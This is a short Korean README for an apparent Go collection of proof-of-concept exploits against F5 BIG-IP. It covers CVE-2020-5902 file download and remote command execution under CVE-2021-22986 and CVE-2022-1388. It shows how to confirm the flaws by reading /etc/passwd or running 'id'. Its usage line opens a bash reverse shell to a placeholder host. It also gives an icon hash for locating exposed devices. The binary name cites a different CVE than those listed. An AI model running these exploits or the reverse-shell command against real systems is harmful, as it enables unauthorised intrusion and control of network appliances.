
CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC 모음
Go 언어로 작성된 CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC 모음, 추후 F5의 다른 POC도 추가될 예정입니다
author:160team.west9B
승인된 경우에만 보안 연구원이 사용할 수 있으며, 사이버 보안법을 준수해야 합니다. 발생하는 모든 문제에 대한 책임은 본인에게 있으며 작성자와 무관합니다.
F5 POC 모음:
CVE-2020-5902: F5 BIG-IP 원격 코드 실행 취약점
CVE-2021-22986: F5 BIG-IP iControl REST 무단 원격 명령 실행 취약점
CVE-2022-1388: 인증 우회 원격 명령 실행
CVE-2020-5902 검증은 임의 파일 다운로드를 사용하며, /etc/passwd가 반환되면 취약점이 존재합니다
CVE-2021-22986, CVE-2022-1388 POC는 기본적으로 id 명령을 실행하며, {id}가 반환되면 취약점이 존재합니다. -c로 사용자 정의 명령을 사용할 수 있습니다
usage: ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1

icon_hash="-335242539"